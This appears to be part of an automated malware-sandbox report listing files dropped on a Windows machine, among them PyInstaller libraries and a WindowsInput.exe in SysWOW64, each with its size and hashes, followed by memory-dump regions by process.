  • C:\Users\Admin\AppData\Local\Temp\_MEI51122\tcl86t.dll

    Filesize

    1.8MB

    MD5

    3688caba94d9a1dc124df80aef41ac47

    SHA1

    66b314fc54b1d2475bfb655facacf8a8d6eacfed

    SHA256

    31560ca3b0eec014013405e9652b9261824232883749f0461d7d4e5f7faea3ab

    SHA512

    f3cd68e26f008b27370bd5222b6dafd8bb5f312a885db4e2f8f6502a719403263412f2aa7c8451b4ab7c59e674e3746710ce5a3c3c09f0cdb0266f82f226e9f4

  • C:\Users\Admin\AppData\Local\Temp\_MEI51122\tk86t.dll

    Filesize

    1.5MB

    MD5

    d379810228b51c2571d9071eed3286b8

    SHA1

    a643cda1683168e27a209b397d0eea7bc14c5103

    SHA256

    34d402f3d6a237aac1165a010016ac032e0ae1a86dcfa03dda49ebfc0af40cad

    SHA512

    f195c4d38f3e1d6853efae68ef50a2d3e70fc0f3840aa9aa2c1cddaec6a311e60cd86fc84dcdf0d4febf4d0e94bb89238c1408c5781302bbfaeafc613e10084a

  • C:\Users\Admin\AppData\Local\Temp\_MEI51122\unicodedata.pyd

    Filesize

    694KB

    MD5

    c0b4c55ce3711af914b2015f707e4452

    SHA1

    f1c1e9f8a461cfee1199d2100f5c0796733518b6

    SHA256

    a67eec238162fde20ac24ca7df931792734aad0611be22d1b3a71bc15acf72f3

    SHA512

    fa6bd9223898ef0c54ca9a67b10207bfce152eadbaec4c91d4e951d0790f455066f5095ed739fa2452aea1420d154beb00bfa9e6e10b46bed687c5d0d7484900

  • C:\Users\Admin\AppData\Local\Temp\_MEI51122\zlib1.dll

    Filesize

    144KB

    MD5

    de2e3379deeacbe476b9ee8ddeac7ffe

    SHA1

    b112c267f5a6e3d06809896708d9ef9f7c118462

    SHA256

    94675de9234f00e75c73e4973f8fb49a272a1df8003337205cd1b15fb642a168

    SHA512

    0dbe2d131f41258c81e931bbc459051b26de488030a0ad20cb1d2d8ce8cce0a1ddd17a7049a2878368d7e535428bdc6c7886265f43be27fbc6aeed784080c93b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w3p0c5ht.ixj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\SysWOW64\WindowsInput.InstallLog

    Filesize

    597B

    MD5

    c2291863df7c2d3038ce3c22fa276506

    SHA1

    7b7d2bc07a6c35523807342c747c9b6a19f3184e

    SHA256

    14504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da

    SHA512

    00bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa

  • C:\Windows\SysWOW64\WindowsInput.exe

    Filesize

    21KB

    MD5

    e854a4636afc652b320e12e50ba4080e

    SHA1

    8a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc

    SHA256

    94b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5

    SHA512

    30aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118

  • memory/1044-1107-0x000000001B130000-0x000000001B150000-memory.dmp

    Filesize

    128KB

  • memory/1044-1101-0x000000001B0F0000-0x000000001B108000-memory.dmp

    Filesize

    96KB

  • memory/1044-1110-0x000000001B450000-0x000000001B474000-memory.dmp

    Filesize

    144KB

  • memory/1044-1118-0x000000001BDB0000-0x000000001C27E000-memory.dmp

    Filesize

    4.8MB

  • memory/1044-1119-0x000000001C320000-0x000000001C3BC000-memory.dmp

    Filesize

    624KB

  • memory/1748-1141-0x00007FF81B760000-0x00007FF81B8DF000-memory.dmp

    Filesize

    1.5MB

  • memory/1748-1204-0x00007FF821BD0000-0x00007FF821BFB000-memory.dmp

    Filesize

    172KB

  • memory/1748-1057-0x00007FF825D70000-0x00007FF825D7F000-memory.dmp

    Filesize

    60KB

  • memory/1748-1058-0x00007FF823F70000-0x00007FF823F89000-memory.dmp

    Filesize

    100KB

  • memory/1748-1059-0x00007FF821BD0000-0x00007FF821BFB000-memory.dmp

    Filesize

    172KB

  • memory/1748-1197-0x00007FF809C40000-0x00007FF809D0E000-memory.dmp

    Filesize

    824KB

  • memory/1748-1199-0x00007FF81C860000-0x00007FF81C874000-memory.dmp

    Filesize

    80KB

  • memory/1748-1200-0x00007FF8209A0000-0x00007FF8209AD000-memory.dmp

    Filesize

    52KB

  • memory/1748-1140-0x00007FF820C10000-0x00007FF820C35000-memory.dmp

    Filesize

    148KB

  • memory/1748-1187-0x00007FF809D10000-0x00007FF80A374000-memory.dmp

    Filesize

    6.4MB

  • memory/1748-1144-0x00007FF821BC0000-0x00007FF821BCD000-memory.dmp

    Filesize

    52KB

  • memory/1748-1143-0x00007FF8208C0000-0x00007FF8208D9000-memory.dmp

    Filesize

    100KB

  • memory/1748-1198-0x00007FF809700000-0x00007FF809C33000-memory.dmp

    Filesize

    5.2MB

  • memory/1748-1150-0x00007FF809D10000-0x00007FF80A374000-memory.dmp

    Filesize

    6.4MB

  • memory/1748-1153-0x00007FF818F30000-0x00007FF818FE3000-memory.dmp

    Filesize

    716KB

  • memory/1748-1152-0x00007FF8209A0000-0x00007FF8209AD000-memory.dmp

    Filesize

    52KB

  • memory/1748-1151-0x00007FF81C860000-0x00007FF81C874000-memory.dmp

    Filesize

    80KB

  • memory/1748-1149-0x00007FF81C880000-0x00007FF81C8B3000-memory.dmp

    Filesize

    204KB

  • memory/1748-1148-0x000001F2AF660000-0x000001F2AFB93000-memory.dmp

    Filesize

    5.2MB

  • memory/1748-1147-0x00007FF809700000-0x00007FF809C33000-memory.dmp

    Filesize

    5.2MB

  • memory/1748-1146-0x00007FF809C40000-0x00007FF809D0E000-memory.dmp

    Filesize

    824KB

  • memory/1748-1202-0x00007FF823F70000-0x00007FF823F89000-memory.dmp

    Filesize

    100KB

  • memory/1748-1203-0x00007FF821BC0000-0x00007FF821BCD000-memory.dmp

    Filesize

    52KB

  • memory/1748-1056-0x00007FF825130000-0x00007FF825157000-memory.dmp

    Filesize

    156KB

  • memory/1748-1205-0x00007FF825D70000-0x00007FF825D7F000-memory.dmp

    Filesize

    60KB

  • memory/1748-1206-0x00007FF81C880000-0x00007FF81C8B3000-memory.dmp

    Filesize

    204KB

  • memory/1748-1207-0x00007FF825130000-0x00007FF825157000-memory.dmp

    Filesize

    156KB

  • memory/1748-1208-0x00007FF820C10000-0x00007FF820C35000-memory.dmp

    Filesize

    148KB

  • memory/1748-1209-0x00007FF81B760000-0x00007FF81B8DF000-memory.dmp

    Filesize

    1.5MB

  • memory/1748-84-0x00007FF809D10000-0x00007FF80A374000-memory.dmp

    Filesize

    6.4MB

  • memory/1748-1210-0x00007FF8208C0000-0x00007FF8208D9000-memory.dmp

    Filesize

    100KB

  • memory/1748-1201-0x00007FF818F30000-0x00007FF818FE3000-memory.dmp

    Filesize

    716KB

  • memory/1748-1165-0x00007FF821BD0000-0x00007FF821BFB000-memory.dmp

    Filesize

    172KB

  • memory/2108-1-0x0000000000850000-0x0000000001A44000-memory.dmp

    Filesize

    18.0MB

  • memory/2108-0-0x00007FF80D083000-0x00007FF80D085000-memory.dmp

    Filesize

    8KB

  • memory/2108-93-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/2108-27-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/2404-1258-0x00007FF820ED0000-0x00007FF820EF9000-memory.dmp

    Filesize

    164KB

  • memory/2716-1145-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/2716-28-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/2716-1257-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/2716-29-0x0000000000B20000-0x0000000000B30000-memory.dmp

    Filesize

    64KB

  • memory/2716-1259-0x00007FF80D080000-0x00007FF80DB42000-memory.dmp

    Filesize

    10.8MB

  • memory/4684-582-0x0000000005760000-0x00000000057F2000-memory.dmp

    Filesize

    584KB

  • memory/4684-428-0x0000000005970000-0x0000000005F16000-memory.dmp

    Filesize

    5.6MB

  • memory/4684-318-0x0000000002C40000-0x0000000002C4A000-memory.dmp

    Filesize

    40KB

  • memory/4684-591-0x00000000056C0000-0x000000000570C000-memory.dmp

    Filesize

    304KB

  • memory/4684-881-0x0000000005750000-0x000000000575C000-memory.dmp

    Filesize

    48KB

  • memory/4684-855-0x0000000005710000-0x0000000005718000-memory.dmp

    Filesize

    32KB

  • memory/4684-876-0x0000000005830000-0x0000000005852000-memory.dmp

    Filesize

    136KB

  • memory/4684-1142-0x0000000006420000-0x000000000646E000-memory.dmp

    Filesize

    312KB

  • memory/4684-134-0x00000000007F0000-0x00000000008CA000-memory.dmp

    Filesize

    872KB

  • memory/4684-856-0x0000000005730000-0x0000000005738000-memory.dmp

    Filesize

    32KB

  • memory/4876-1164-0x0000020A589F0000-0x0000020A58A12000-memory.dmp

    Filesize

    136KB

  • memory/5060-1213-0x0000000007580000-0x00000000075E6000-memory.dmp

    Filesize

    408KB

  • memory/5060-1248-0x0000000007610000-0x0000000007622000-memory.dmp

    Filesize

    72KB

  • memory/5060-1247-0x0000000007C10000-0x0000000008228000-memory.dmp

    Filesize

    6.1MB

  • memory/5060-1249-0x0000000007670000-0x00000000076AC000-memory.dmp

    Filesize

    240KB

  • memory/5060-1250-0x00000000076B0000-0x00000000076FC000-memory.dmp

    Filesize

    304KB

  • memory/5060-1251-0x0000000007830000-0x000000000793A000-memory.dmp

    Filesize

    1.0MB

  • memory/5060-1252-0x0000000008760000-0x0000000008C8C000-memory.dmp

    Filesize

    5.2MB

  • memory/5060-1167-0x0000000005800000-0x0000000005810000-memory.dmp

    Filesize

    64KB

  • memory/5060-1177-0x0000000007170000-0x000000000717A000-memory.dmp

    Filesize

    40KB

  • memory/5060-1166-0x0000000006030000-0x00000000061F2000-memory.dmp

    Filesize

    1.8MB